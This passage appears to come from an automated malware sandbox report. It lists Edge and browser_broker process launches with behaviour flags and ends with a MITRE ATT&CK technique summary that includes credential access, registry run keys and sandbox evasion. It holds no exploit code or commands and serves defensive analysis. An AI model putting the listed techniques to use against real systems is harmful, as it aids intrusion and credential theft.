C:\Windows\system32\AUDIODG.EXE 0x438
1⤵
PID:4024

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4068

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3952

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3548

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4904

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4116

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:948

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3336

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3636

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6084

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6684

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4692

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3996

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5176

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:7028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3208

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4092

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4132

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6984

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4636

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:192

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery